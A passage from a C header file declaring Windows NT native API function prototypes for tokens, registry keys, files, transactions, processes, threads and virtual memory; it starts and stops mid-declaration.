5528 | _Inout_ PVOID SystemInformation, 5529 | _In_ ULONG SystemInformationLength, 5530 | _Out_opt_ PULONG ReturnLength 5531 | ); 5532 | 5533 | NTSTATUS NTAPI NtSetSystemInformation( 5534 | _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass, 5535 | _In_opt_ PVOID SystemInformation, 5536 | _In_ ULONG SystemInformationLength 5537 | ); 5538 | 5539 | NTSTATUS NTAPI NtCreateMutant( 5540 | _Out_ PHANDLE MutantHandle, 5541 | _In_ ACCESS_MASK DesiredAccess, 5542 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 5543 | _In_ BOOLEAN InitialOwner 5544 | ); 5545 | 5546 | NTSTATUS NTAPI NtOpenMutant( 5547 | _Out_ PHANDLE MutantHandle, 5548 | _In_ ACCESS_MASK DesiredAccess, 5549 | _In_ POBJECT_ATTRIBUTES ObjectAttributes 5550 | ); 5551 | 5552 | NTSTATUS NTAPI NtQueryMutant( 5553 | _In_ HANDLE MutantHandle, 5554 | _In_ MUTANT_INFORMATION_CLASS MutantInformationClass, 5555 | _Out_ PVOID MutantInformation, 5556 | _In_ ULONG MutantInformationLength, 5557 | _Out_opt_ PULONG ReturnLength 5558 | ); 5559 | 5560 | NTSTATUS NTAPI NtReleaseMutant( 5561 | _In_ HANDLE MutantHandle, 5562 | _Out_opt_ PLONG PreviousCount 5563 | ); 5564 | 5565 | NTSTATUS NTAPI NtCreateTimer( 5566 | _In_ PHANDLE TimerHandle, 5567 | _In_ ACCESS_MASK DesiredAccess, 5568 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 5569 | _In_ TIMER_TYPE TimerType 5570 | ); 5571 | 5572 | NTSTATUS NtSetTimer( 5573 | _In_ HANDLE TimerHandle, 5574 | _In_ PLARGE_INTEGER DueTime, 5575 | _In_opt_ PTIMER_APC_ROUTINE TimerApcRoutine, 5576 | _In_opt_ PVOID TimerContext, 5577 | _In_ BOOLEAN WakeTimer, 5578 | _In_opt_ LONG Period, 5579 | _Out_opt_ PBOOLEAN PreviousState 5580 | ); 5581 | 5582 | NTSTATUS NTAPI NtOpenTimer( 5583 | _In_ PHANDLE TimerHandle, 5584 | _In_ ACCESS_MASK DesiredAccess, 5585 | _In_ POBJECT_ATTRIBUTES ObjectAttributes 5586 | ); 5587 | 5588 | NTSTATUS NTAPI NtQueryTimer( 5589 | _In_ HANDLE TimerHandle, 5590 | _In_ TIMER_INFORMATION_CLASS TimerInformationClass, 5591 | _Out_ PVOID TimerInformation, 5592 | _In_ ULONG TimerInformationLength, 5593 | _Out_opt_ PULONG ReturnLength 5594 | ); 5595 | 5596 | NTSTATUS NTAPI NtCreateSymbolicLinkObject( 5597 | _Out_ PHANDLE LinkHandle, 5598 | _In_ ACCESS_MASK DesiredAccess, 5599 | _In_ POBJECT_ATTRIBUTES ObjectAttributes, 5600 | _In_ PUNICODE_STRING LinkTarget 5601 | ); 5602 | 5603 | NTSTATUS WINAPI NtOpenSymbolicLinkObject( 5604 | _Out_ PHANDLE LinkHandle, 5605 | _In_ ACCESS_MASK DesiredAccess, 5606 | _In_ POBJECT_ATTRIBUTES ObjectAttributes 5607 | ); 5608 | 5609 | NTSTATUS NTAPI NtQuerySymbolicLinkObject( 5610 | _In_ HANDLE LinkHandle, 5611 | _Inout_ PUNICODE_STRING LinkTarget, 5612 | _Out_opt_ PULONG ReturnedLength 5613 | ); 5614 | 5615 | NTSTATUS NTAPI NtQuerySemaphore( 5616 | _In_ HANDLE SemaphoreHandle, 5617 | _In_ SEMAPHORE_INFORMATION_CLASS SemaphoreInformationClass, 5618 | _Out_ PVOID SemaphoreInformation, 5619 | _In_ ULONG SemaphoreInformationLength, 5620 | _Out_opt_ PULONG ReturnLength 5621 | ); 5622 | 5623 | NTSTATUS NTAPI NtQueryDirectoryFile( 5624 | _In_ HANDLE FileHandle, 5625 | _In_opt_ HANDLE Event, 5626 | _In_opt_ PIO_APC_ROUTINE ApcRoutine, 5627 | _In_opt_ PVOID ApcContext, 5628 | _Out_ PIO_STATUS_BLOCK IoStatusBlock, 5629 | _Out_ PVOID FileInformation, 5630 | _In_ ULONG Length, 5631 | _In_ FILE_INFORMATION_CLASS FileInformationClass, 5632 | _In_ BOOLEAN ReturnSingleEntry, 5633 | _In_opt_ PUNICODE_STRING FileName, 5634 | _In_ BOOLEAN RestartScan 5635 | ); 5636 | 5637 | NTSTATUS NTAPI NtNotifyChangeDirectoryFile( 5638 | _In_ HANDLE FileHandle, 5639 | _In_opt_ HANDLE Event, 5640 | _In_opt_ PIO_APC_ROUTINE ApcRoutine, 5641 | _In_opt_ PVOID ApcContext, 5642 | _Out_ PIO_STATUS_BLOCK IoStatusBlock, 5643 | __out_bcount(Length) PVOID Buffer, 5644 | _In_ ULONG Length, 5645 | _In_ ULONG CompletionFilter, 5646 | _In_ BOOLEAN WatchTree 5647 | ); 5648 | 5649 | NTSTATUS NTAPI NtQuerySection( 5650 | _In_ HANDLE SectionHandle, 5651 | _In_ SECTION_INFORMATION_CLASS SectionInformationClass, 5652 | _Out_ PVOID SectionInformation, 5653 | _In_ SIZE_T SectionInformationLength, 5654 | _Out_opt_ PSIZE_T ReturnLength 5655 | ); 5656 | 5657 | NTSTATUS NtOpenSection( 5658 | _Out_ PHANDLE SectionHandle, 5659 | _In_ ACCESS_MASK DesiredAccess, 5660 | _In_ POBJECT_ATTRIBUTES ObjectAttributes 5661 | ); 5662 | 5663 | NTSTATUS NTAPI NtCreateSection( 5664 | _Out_ PHANDLE SectionHandle, 5665 | _In_ ACCESS_MASK DesiredAccess, 5666 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 5667 | _In_opt_ PLARGE_INTEGER MaximumSize, 5668 | _In_ ULONG SectionPageProtection, 5669 | _In_ ULONG AllocationAttributes, 5670 | _In_opt_ HANDLE FileHandle 5671 | ); 5672 | 5673 | NTSTATUS NTAPI NtMapViewOfSection( 5674 | _In_ HANDLE SectionHandle, 5675 | _In_ HANDLE ProcessHandle, 5676 | __inout PVOID *BaseAddress, 5677 | _In_ ULONG_PTR ZeroBits, 5678 | _In_ SIZE_T CommitSize, 5679 | _Inout_opt_ PLARGE_INTEGER SectionOffset, 5680 | _Inout_ PSIZE_T ViewSize, 5681 | _In_ SECTION_INHERIT InheritDisposition, 5682 | _In_ ULONG AllocationType, 5683 | _In_ ULONG Win32Protect 5684 | ); 5685 | 5686 | NTSTATUS NTAPI NtUnmapViewOfSection( 5687 | _In_ HANDLE ProcessHandle, 5688 | _In_ PVOID BaseAddress 5689 | ); 5690 | 5691 | NTSTATUS NTAPI NtOpenProcessToken( 5692 | _In_ HANDLE ProcessHandle, 5693 | _In_ ACCESS_MASK DesiredAccess, 5694 | _Out_ PHANDLE TokenHandle 5695 | ); 5696 | 5697 | NTSTATUS NTAPI NtDuplicateToken( 5698 | _In_ HANDLE ExistingTokenHandle, 5699 | _In_ ACCESS_MASK DesiredAccess, 5700 | _In_ POBJECT_ATTRIBUTES ObjectAttributes, 5701 | _In_ BOOLEAN EffectiveOnly, 5702 | _In_ TOKEN_TYPE TokenType, 5703 | _Out_ PHANDLE NewTokenHandle 5704 | ); 5705 | 5706 | #define DISABLE_MAX_PRIVILEGE 0x1 // winnt 5707 | #define SANDBOX_INERT 0x2 // winnt 5708 | #define LUA_TOKEN 0x4 5709 | #define WRITE_RESTRICT 0x8 5710 | 5711 | NTSTATUS NTAPI NtFilterToken( 5712 | _In_ HANDLE ExistingTokenHandle, 5713 | _In_ ULONG Flags, 5714 | _In_opt_ PTOKEN_GROUPS SidsToDisable, 5715 | _In_opt_ PTOKEN_PRIVILEGES PrivilegesToDelete, 5716 | _In_opt_ PTOKEN_GROUPS RestrictedSids, 5717 | _Out_ PHANDLE NewTokenHandle 5718 | ); 5719 | 5720 | NTSTATUS NTAPI NtImpersonateAnonymousToken( 5721 | _In_ HANDLE ThreadHandle 5722 | ); 5723 | 5724 | NTSTATUS NTAPI NtQueryInformationToken( 5725 | _In_ HANDLE TokenHandle, 5726 | _In_ TOKEN_INFORMATION_CLASS TokenInformationClass, 5727 | _Out_ PVOID TokenInformation, 5728 | _In_ ULONG TokenInformationLength, 5729 | _Out_ PULONG ReturnLength 5730 | ); 5731 | 5732 | NTSTATUS NTAPI NtSetInformationToken( 5733 | _In_ HANDLE TokenHandle, 5734 | _In_ TOKEN_INFORMATION_CLASS TokenInformationClass, 5735 | _In_ PVOID TokenInformation, 5736 | _In_ ULONG TokenInformationLength 5737 | ); 5738 | 5739 | NTSTATUS NTAPI NtOpenThreadTokenEx( 5740 | _In_ HANDLE ThreadHandle, 5741 | _In_ ACCESS_MASK DesiredAccess, 5742 | _In_ BOOLEAN OpenAsSelf, 5743 | _In_ ULONG HandleAttributes, 5744 | _Out_ PHANDLE TokenHandle 5745 | ); 5746 | 5747 | NTSTATUS NTAPI NtAdjustPrivilegesToken( 5748 | _In_ HANDLE TokenHandle, 5749 | _In_ BOOLEAN DisableAllPrivileges, 5750 | _In_opt_ PTOKEN_PRIVILEGES NewState, 5751 | _In_opt_ ULONG BufferLength, 5752 | _Out_opt_ PTOKEN_PRIVILEGES PreviousState, 5753 | _Out_opt_ PULONG ReturnLength 5754 | ); 5755 | 5756 | NTSTATUS NTAPI NtQueryInformationToken( 5757 | _In_ HANDLE TokenHandle, 5758 | _In_ TOKEN_INFORMATION_CLASS TokenInformationClass, 5759 | _Out_ PVOID TokenInformation, 5760 | _In_ ULONG TokenInformationLength, 5761 | _Out_ PULONG ReturnLength 5762 | ); 5763 | 5764 | NTSTATUS NTAPI NtCreateKey( 5765 | _Out_ PHANDLE KeyHandle, 5766 | _In_ ACCESS_MASK DesiredAccess, 5767 | _In_ POBJECT_ATTRIBUTES ObjectAttributes, 5768 | __reserved ULONG TitleIndex, 5769 | _In_opt_ PUNICODE_STRING Class, 5770 | _In_ ULONG CreateOptions, 5771 | _Out_opt_ PULONG Disposition 5772 | ); 5773 | 5774 | NTSTATUS NTAPI NtOpenKey( 5775 | _Out_ PHANDLE KeyHandle, 5776 | _In_ ACCESS_MASK DesiredAccess, 5777 | _In_ POBJECT_ATTRIBUTES ObjectAttributes 5778 | ); 5779 | 5780 | NTSTATUS NTAPI NtQueryKey( 5781 | _In_ HANDLE KeyHandle, 5782 | _In_ KEY_INFORMATION_CLASS KeyInformationClass, 5783 | _Out_opt_ PVOID KeyInformation, 5784 | _In_ ULONG Length, 5785 | _Out_ PULONG ResultLength 5786 | ); 5787 | 5788 | NTSTATUS NTAPI NtQueryValueKey( 5789 | _In_ HANDLE KeyHandle, 5790 | _In_ PUNICODE_STRING ValueName, 5791 | _In_ KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, 5792 | _Out_ PVOID KeyValueInformation, 5793 | _In_ ULONG Length, 5794 | _Out_ PULONG ResultLength 5795 | ); 5796 | 5797 | NTSTATUS NTAPI NtSetValueKey( 5798 | _In_ HANDLE KeyHandle, 5799 | _In_ PUNICODE_STRING ValueName, 5800 | _In_opt_ ULONG TitleIndex, 5801 | _In_ ULONG Type, 5802 | _In_ PVOID Data, 5803 | _In_ ULONG DataSize 5804 | ); 5805 | 5806 | NTSTATUS NTAPI NtDeleteKey( 5807 | _In_ HANDLE KeyHandle 5808 | ); 5809 | 5810 | NTSTATUS NTAPI NtDeleteValueKey( 5811 | _In_ HANDLE KeyHandle, 5812 | _In_ PUNICODE_STRING ValueName 5813 | ); 5814 | 5815 | NTSTATUS NTAPI NtLoadDriver( 5816 | _In_ PUNICODE_STRING DriverServiceName 5817 | ); 5818 | 5819 | NTSTATUS NTAPI NtUnloadDriver( 5820 | _In_ PUNICODE_STRING DriverServiceName 5821 | ); 5822 | 5823 | NTSTATUS NTAPI NtOpenJobObject( 5824 | _Out_ PHANDLE JobHandle, 5825 | _In_ ACCESS_MASK DesiredAccess, 5826 | _In_ POBJECT_ATTRIBUTES ObjectAttributes 5827 | ); 5828 | 5829 | NTSTATUS NTAPI NtQueryInformationJobObject( 5830 | _In_opt_ HANDLE JobHandle, 5831 | _In_ JOBOBJECTINFOCLASS JobObjectInformationClass, 5832 | _Out_ PVOID JobObjectInformation, 5833 | _In_ ULONG JobObjectInformationLength, 5834 | _Out_opt_ PULONG ReturnLength 5835 | ); 5836 | 5837 | NTSTATUS NTAPI NtOpenIoCompletion( 5838 | _Out_ PHANDLE IoCompletionHandle, 5839 | _In_ ACCESS_MASK DesiredAccess, 5840 | _In_ POBJECT_ATTRIBUTES ObjectAttributes 5841 | ); 5842 | 5843 | NTSTATUS NTAPI NtQueryIoCompletion( 5844 | _In_ HANDLE IoCompletionHandle, 5845 | _In_ IO_COMPLETION_INFORMATION_CLASS IoCompletionInformationClass, 5846 | _Out_ PVOID IoCompletionInformation, 5847 | _In_ ULONG IoCompletionInformationLength, 5848 | _Out_opt_ PULONG ReturnLength 5849 | ); 5850 | 5851 | NTSTATUS NTAPI NtQueryInformationFile( 5852 | _In_ HANDLE FileHandle, 5853 | _Out_ PIO_STATUS_BLOCK IoStatusBlock, 5854 | _Out_ PVOID FileInformation, 5855 | _In_ ULONG Length, 5856 | _In_ FILE_INFORMATION_CLASS FileInformationClass 5857 | ); 5858 | 5859 | NTSTATUS NTAPI NtQueryFullAttributesFile( 5860 | __in POBJECT_ATTRIBUTES ObjectAttributes, 5861 | __out PFILE_NETWORK_OPEN_INFORMATION FileInformation 5862 | ); 5863 | 5864 | NTSTATUS NTAPI NtQueryDirectoryFile( 5865 | _In_ HANDLE FileHandle, 5866 | _In_opt_ HANDLE Event, 5867 | _In_opt_ PIO_APC_ROUTINE ApcRoutine, 5868 | _In_opt_ PVOID ApcContext, 5869 | _Out_ PIO_STATUS_BLOCK IoStatusBlock, 5870 | _Out_ PVOID FileInformation, 5871 | _In_ ULONG Length, 5872 | _In_ FILE_INFORMATION_CLASS FileInformationClass, 5873 | _In_ BOOLEAN ReturnSingleEntry, 5874 | _In_opt_ PUNICODE_STRING FileName, 5875 | _In_ BOOLEAN RestartScan 5876 | ); 5877 | 5878 | NTSTATUS NTAPI NtQueryEaFile( 5879 | _In_ HANDLE FileHandle, 5880 | _Out_ PIO_STATUS_BLOCK IoStatusBlock, 5881 | __out_bcount(Length) PVOID Buffer, 5882 | _In_ ULONG Length, 5883 | _In_ BOOLEAN ReturnSingleEntry, 5884 | __in_bcount_opt(EaListLength) PVOID EaList, 5885 | _In_ ULONG EaListLength, 5886 | _In_opt_ PULONG EaIndex, 5887 | _In_ BOOLEAN RestartScan 5888 | ); 5889 | 5890 | NTSTATUS NTAPI NtSetEaFile( 5891 | _In_ HANDLE FileHandle, 5892 | _Out_ PIO_STATUS_BLOCK IoStatusBlock, 5893 | __in_bcount(Length) PVOID Buffer, 5894 | _In_ ULONG Length 5895 | ); 5896 | 5897 | NTSTATUS NTAPI NtQueryVolumeInformationFile( 5898 | _In_ HANDLE FileHandle, 5899 | _Out_ PIO_STATUS_BLOCK IoStatusBlock, 5900 | _Out_ PVOID FsInformation, 5901 | _In_ ULONG Length, 5902 | _In_ FS_INFORMATION_CLASS FsInformationClass 5903 | ); 5904 | 5905 | NTSTATUS NTAPI NtOpenFile( 5906 | _Out_ PHANDLE FileHandle, 5907 | _In_ ACCESS_MASK DesiredAccess, 5908 | _In_ POBJECT_ATTRIBUTES ObjectAttributes, 5909 | _Out_ PIO_STATUS_BLOCK IoStatusBlock, 5910 | _In_ ULONG ShareAccess, 5911 | _In_ ULONG OpenOptions 5912 | ); 5913 | 5914 | NTSTATUS NTAPI NtReadFile( 5915 | _In_ HANDLE FileHandle, 5916 | _In_opt_ HANDLE Event, 5917 | _In_opt_ PIO_APC_ROUTINE ApcRoutine, 5918 | _In_opt_ PVOID ApcContext, 5919 | _Out_ PIO_STATUS_BLOCK IoStatusBlock, 5920 | __out_bcount(Length) PVOID Buffer, 5921 | _In_ ULONG Length, 5922 | _In_opt_ PLARGE_INTEGER ByteOffset, 5923 | _In_opt_ PULONG Key 5924 | ); 5925 | 5926 | NTSTATUS NTAPI NtWriteFile( 5927 | _In_ HANDLE FileHandle, 5928 | _In_opt_ HANDLE Event, 5929 | _In_opt_ PIO_APC_ROUTINE ApcRoutine, 5930 | _In_opt_ PVOID ApcContext, 5931 | _Out_ PIO_STATUS_BLOCK IoStatusBlock, 5932 | _In_ PVOID Buffer, 5933 | _In_ ULONG Length, 5934 | _In_opt_ PLARGE_INTEGER ByteOffset, 5935 | _In_opt_ PULONG Key 5936 | ); 5937 | 5938 | NTSTATUS NTAPI NtFlushBuffersFile( 5939 | _In_ HANDLE FileHandle, 5940 | _Out_ PIO_STATUS_BLOCK IoStatusBlock 5941 | ); 5942 | 5943 | NTSTATUS NTAPI NtSetInformationFile( 5944 | _In_ HANDLE FileHandle, 5945 | _Out_ PIO_STATUS_BLOCK IoStatusBlock, 5946 | __in_bcount(Length) PVOID FileInformation, 5947 | _In_ ULONG Length, 5948 | _In_ FILE_INFORMATION_CLASS FileInformationClass 5949 | ); 5950 | 5951 | NTSTATUS NTAPI NtDeleteFile( 5952 | _In_ POBJECT_ATTRIBUTES ObjectAttributes 5953 | ); 5954 | 5955 | NTSTATUS NTAPI NtOpenEvent( 5956 | _Out_ PHANDLE EventHandle, 5957 | _In_ ACCESS_MASK DesiredAccess, 5958 | _In_ POBJECT_ATTRIBUTES ObjectAttributes 5959 | ); 5960 | 5961 | NTSTATUS NTAPI NtOpenKeyedEvent( 5962 | _Out_ PHANDLE KeyedEventHandle, 5963 | _In_ ACCESS_MASK DesiredAccess, 5964 | _In_ POBJECT_ATTRIBUTES ObjectAttributes 5965 | ); 5966 | 5967 | NTSTATUS NTAPI NtOpenSemaphore( 5968 | _Out_ PHANDLE SemaphoreHandle, 5969 | _In_ ACCESS_MASK DesiredAccess, 5970 | _In_ POBJECT_ATTRIBUTES ObjectAttributes 5971 | ); 5972 | 5973 | NTSTATUS NTAPI NtQueryEvent( 5974 | _In_ HANDLE EventHandle, 5975 | _In_ EVENT_INFORMATION_CLASS EventInformationClass, 5976 | _Out_ PVOID EventInformation, 5977 | _In_ ULONG EventInformationLength, 5978 | _Out_opt_ PULONG ReturnLength 5979 | ); 5980 | 5981 | NTSTATUS NTAPI NtOpenEventPair( 5982 | _Out_ PHANDLE EventPairHandle, 5983 | _In_ ACCESS_MASK DesiredAccess, 5984 | _In_ POBJECT_ATTRIBUTES ObjectAttributes 5985 | ); 5986 | 5987 | //TmTx 5988 | NTSTATUS NTAPI NtCreateTransaction( 5989 | _Out_ PHANDLE TransactionHandle, 5990 | _In_ ACCESS_MASK DesiredAccess, 5991 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 5992 | _In_opt_ LPGUID Uow, 5993 | _In_opt_ HANDLE TmHandle, 5994 | _In_opt_ ULONG CreateOptions, 5995 | _In_opt_ ULONG IsolationLevel, 5996 | _In_opt_ ULONG IsolationFlags, 5997 | _In_opt_ PLARGE_INTEGER Timeout, 5998 | _In_opt_ PUNICODE_STRING Description 5999 | ); 6000 | 6001 | NTSTATUS NTAPI NtRollbackTransaction( 6002 | _In_ HANDLE TransactionHandle, 6003 | _In_ BOOLEAN Wait); 6004 | 6005 | //TmRm 6006 | NTSTATUS NTAPI NtCreateResourceManager( 6007 | _Out_ PHANDLE ResourceManagerHandle, 6008 | _In_ ACCESS_MASK DesiredAccess, 6009 | _In_ HANDLE TmHandle, 6010 | _In_opt_ LPGUID ResourceManagerGuid, 6011 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 6012 | _In_opt_ ULONG CreateOptions, 6013 | _In_opt_ PUNICODE_STRING Description 6014 | ); 6015 | 6016 | //TmEn 6017 | NTSTATUS NTAPI NtCreateEnlistment( 6018 | _Out_ PHANDLE EnlistmentHandle, 6019 | _In_ ACCESS_MASK DesiredAccess, 6020 | _In_ HANDLE ResourceManagerHandle, 6021 | _In_ HANDLE TransactionHandle, 6022 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 6023 | _In_opt_ ULONG CreateOptions, 6024 | _In_ NOTIFICATION_MASK NotificationMask, 6025 | _In_opt_ PVOID EnlistmentKey 6026 | ); 6027 | 6028 | //TmTm 6029 | NTSTATUS NTAPI NtCreateTransactionManager( 6030 | _Out_ PHANDLE TmHandle, 6031 | _In_ ACCESS_MASK DesiredAccess, 6032 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 6033 | _In_opt_ PUNICODE_STRING LogFileName, 6034 | _In_opt_ ULONG CreateOptions, 6035 | _In_opt_ ULONG CommitStrength 6036 | ); 6037 | 6038 | NTSTATUS NTAPI NtCreateFile( 6039 | _Out_ PHANDLE FileHandle, 6040 | _In_ ACCESS_MASK DesiredAccess, 6041 | _In_ POBJECT_ATTRIBUTES ObjectAttributes, 6042 | _Out_ PIO_STATUS_BLOCK IoStatusBlock, 6043 | _In_opt_ PLARGE_INTEGER AllocationSize, 6044 | _In_ ULONG FileAttributes, 6045 | _In_ ULONG ShareAccess, 6046 | _In_ ULONG CreateDisposition, 6047 | _In_ ULONG CreateOptions, 6048 | _In_opt_ PVOID EaBuffer, 6049 | _In_ ULONG EaLength 6050 | ); 6051 | 6052 | NTSTATUS NTAPI NtDeviceIoControlFile( 6053 | _In_ HANDLE FileHandle, 6054 | _In_ HANDLE Event, 6055 | _In_ PIO_APC_ROUTINE ApcRoutine, 6056 | _In_ PVOID ApcContext, 6057 | _Out_ PIO_STATUS_BLOCK IoStatusBlock, 6058 | _In_ ULONG IoControlCode, 6059 | _In_ PVOID InputBuffer, 6060 | _In_ ULONG InputBufferLength, 6061 | _Out_ PVOID OutputBuffer, 6062 | _In_ ULONG OutputBufferLength 6063 | ); 6064 | 6065 | NTSTATUS NTAPI NtFsControlFile( 6066 | _In_ HANDLE FileHandle, 6067 | _In_opt_ HANDLE Event, 6068 | _In_opt_ PIO_APC_ROUTINE ApcRoutine, 6069 | _In_opt_ PVOID ApcContext, 6070 | _Out_ PIO_STATUS_BLOCK IoStatusBlock, 6071 | _In_ ULONG FsControlCode, 6072 | _In_opt_ PVOID InputBuffer, 6073 | _In_ ULONG InputBufferLength, 6074 | _Out_opt_ PVOID OutputBuffer, 6075 | _In_ ULONG OutputBufferLength 6076 | ); 6077 | 6078 | NTSTATUS NTAPI NtCreateUserProcess( 6079 | _Out_ PHANDLE ProcessHandle, 6080 | _Out_ PHANDLE ThreadHandle, 6081 | _In_ ACCESS_MASK ProcessDesiredAccess, 6082 | _In_ ACCESS_MASK ThreadDesiredAccess, 6083 | _In_opt_ POBJECT_ATTRIBUTES ProcessObjectAttributes, 6084 | _In_opt_ POBJECT_ATTRIBUTES ThreadObjectAttributes, 6085 | _In_ ULONG ProcessFlags, 6086 | _In_ ULONG ThreadFlags, 6087 | _In_opt_ PVOID ProcessParameters, 6088 | _Inout_ PPS_CREATE_INFO CreateInfo, 6089 | _In_opt_ PPS_ATTRIBUTE_LIST AttributeList 6090 | ); 6091 | 6092 | NTSTATUS NTAPI NtOpenProcess( 6093 | _Out_ PHANDLE ProcessHandle, 6094 | _In_ ACCESS_MASK DesiredAccess, 6095 | _In_ POBJECT_ATTRIBUTES ObjectAttributes, 6096 | _In_opt_ PCLIENT_ID ClientId 6097 | ); 6098 | 6099 | NTSTATUS NTAPI NtTerminateProcess( 6100 | _In_opt_ HANDLE ProcessHandle, 6101 | _In_ NTSTATUS ExitStatus 6102 | ); 6103 | 6104 | NTSTATUS NTAPI NtSuspendProcess( 6105 | _In_ HANDLE ProcessHandle 6106 | ); 6107 | 6108 | NTSTATUS NTAPI NtResumeProcess( 6109 | _In_ HANDLE ProcessHandle 6110 | ); 6111 | 6112 | NTSTATUS NTAPI NtSuspendThread( 6113 | _In_ HANDLE ThreadHandle, 6114 | _Out_opt_ PULONG PreviousSuspendCount 6115 | ); 6116 | 6117 | NTSTATUS NTAPI NtResumeThread( 6118 | _In_ HANDLE ThreadHandle, 6119 | _Out_opt_ PULONG PreviousSuspendCount 6120 | ); 6121 | 6122 | NTSTATUS NTAPI NtOpenThread( 6123 | _Out_ PHANDLE ThreadHandle, 6124 | _In_ ACCESS_MASK DesiredAccess, 6125 | _In_ POBJECT_ATTRIBUTES ObjectAttributes, 6126 | _In_opt_ PCLIENT_ID ClientId 6127 | ); 6128 | 6129 | NTSTATUS NTAPI NtTerminateThread( 6130 | _In_opt_ HANDLE ThreadHandle, 6131 | _In_ NTSTATUS ExitStatus 6132 | ); 6133 | 6134 | NTSTATUS NTAPI NtImpersonateThread( 6135 | _In_ HANDLE ServerThreadHandle, 6136 | _In_ HANDLE ClientThreadHandle, 6137 | _In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos 6138 | ); 6139 | 6140 | NTSTATUS NTAPI NtSetContextThread( 6141 | _In_ HANDLE ThreadHandle, 6142 | _In_ PCONTEXT ThreadContext 6143 | ); 6144 | 6145 | NTSTATUS NTAPI NtGetContextThread( 6146 | _In_ HANDLE ThreadHandle, 6147 | _Inout_ PCONTEXT ThreadContext 6148 | ); 6149 | 6150 | NTSTATUS NTAPI NtQueryInformationThread( 6151 | _In_ HANDLE ThreadHandle, 6152 | _In_ THREADINFOCLASS ThreadInformationClass, 6153 | _Out_ PVOID ThreadInformation, 6154 | _In_ ULONG ThreadInformationLength, 6155 | _Out_opt_ PULONG ReturnLength 6156 | ); 6157 | 6158 | NTSTATUS NTAPI NtSetInformationThread( 6159 | _In_ HANDLE ThreadHandle, 6160 | _In_ THREADINFOCLASS ThreadInformationClass, 6161 | _In_ PVOID ThreadInformation, 6162 | _In_ ULONG ThreadInformationLength 6163 | ); 6164 | 6165 | NTSTATUS NTAPI NtQueryInformationProcess( 6166 | _In_ HANDLE ProcessHandle, 6167 | _In_ PROCESSINFOCLASS ProcessInformationClass, 6168 | _Out_ PVOID ProcessInformation, 6169 | _In_ ULONG ProcessInformationLength, 6170 | _Out_opt_ PULONG ReturnLength 6171 | ); 6172 | 6173 | NTSTATUS NTAPI NtSetInformationProcess( 6174 | _In_ HANDLE ProcessHandle, 6175 | _In_ PROCESSINFOCLASS ProcessInformationClass, 6176 | _In_count_(ProcessInformationLength) PVOID ProcessInformation, 6177 | _In_ ULONG ProcessInformationLength 6178 | ); 6179 | 6180 | NTSTATUS NTAPI NtDuplicateObject( 6181 | _In_ HANDLE SourceProcessHandle, 6182 | _In_ HANDLE SourceHandle, 6183 | _In_opt_ HANDLE TargetProcessHandle, 6184 | _Out_ PHANDLE TargetHandle, 6185 | _In_ ACCESS_MASK DesiredAccess, 6186 | _In_ ULONG HandleAttributes, 6187 | _In_ ULONG Options 6188 | ); 6189 | 6190 | NTSTATUS NTAPI NtSetSecurityObject( 6191 | _In_ HANDLE Handle, 6192 | _In_ SECURITY_INFORMATION SecurityInformation, 6193 | _In_ PSECURITY_DESCRIPTOR SecurityDescriptor 6194 | ); 6195 | 6196 | NTSTATUS NTAPI NtQuerySecurityObject( 6197 | _In_ HANDLE Handle, 6198 | _In_ SECURITY_INFORMATION SecurityInformation, 6199 | _Out_ PSECURITY_DESCRIPTOR SecurityDescriptor, 6200 | _In_ ULONG Length, 6201 | _Out_ PULONG LengthNeeded 6202 | ); 6203 | 6204 | NTSTATUS NTAPI NtQueryLicenseValue( 6205 | _In_ PUNICODE_STRING ValueName, 6206 | _Out_opt_ PULONG Type, 6207 | _Out_writes_bytes_to_opt_(DataSize, *ResultDataSize) PVOID Data, 6208 | _In_ ULONG DataSize, 6209 | _Out_ PULONG ResultDataSize 6210 | ); 6211 | 6212 | NTSTATUS NtCreateIoCompletion( 6213 | _Out_ PHANDLE IoCompletionHandle, 6214 | _In_ ACCESS_MASK DesiredAccess, 6215 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 6216 | _In_opt_ ULONG Count 6217 | ); 6218 | 6219 | NTSTATUS NTAPI NtCreateEvent( 6220 | _Out_ PHANDLE EventHandle, 6221 | _In_ ACCESS_MASK DesiredAccess, 6222 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 6223 | _In_ EVENT_TYPE EventType, 6224 | _In_ BOOLEAN InitialState 6225 | ); 6226 | 6227 | NTSTATUS NTAPI NtSetEvent( 6228 | _In_ HANDLE EventHandle, 6229 | _Out_opt_ PLONG PreviousState 6230 | ); 6231 | 6232 | NTSTATUS NTAPI NtAllocateVirtualMemory( 6233 | _In_ HANDLE ProcessHandle, 6234 | _Inout_ PVOID *BaseAddress, 6235 | _In_ ULONG_PTR ZeroBits, 6236 | _Inout_ PSIZE_T RegionSize, 6237 | _In_ ULONG AllocationType, 6238 | _In_ ULONG Protect 6239 | ); 6240 | 6241 | NTSTATUS NTAPI NtFreeVirtualMemory( 6242 | _In_ HANDLE ProcessHandle, 6243 | _Inout_ PVOID *BaseAddress, 6244 | _Inout_ PSIZE_T RegionSize, 6245 | _In_ ULONG FreeType 6246 | ); 6247 | 6248 | NTSTATUS NTAPI NtQueryVirtualMemory( 6249 | _In_ HANDLE ProcessHandle, 6250 | _In_ PVOID BaseAddress, 6251 | _In_ MEMORY_INFORMATION_CLASS MemoryInformationClass, 6252 | _Out_ PVOID MemoryInformation, 6253 | _In_ SIZE_T MemoryInformationLength, 6254 | _Out_opt_ PSIZE_T ReturnLength 6255 | ); 6256 | 6257 | NTSTATUS NTAPI NtReadVirtualMemory( 6258 | _In_ HANDLE ProcessHandle, 6259 | _In_opt_ PVOID BaseAddress, 6260 | _Out_ PVOID Buffer, 6261 | _In_ SIZE_T BufferSize, 6262 | _Out_opt_ PSIZE_T NumberOfBytesRead 6263 | ); 6264 | 6265 | NTSTATUS NTAPI NtWriteVirtualMemory( 6266 | _In_ HANDLE ProcessHandle, 6267 | _In_opt_ PVOID BaseAddress, 6268 | _In_ VOID *Buffer, 6269 | _In_ SIZE_T BufferSize, 6270 | 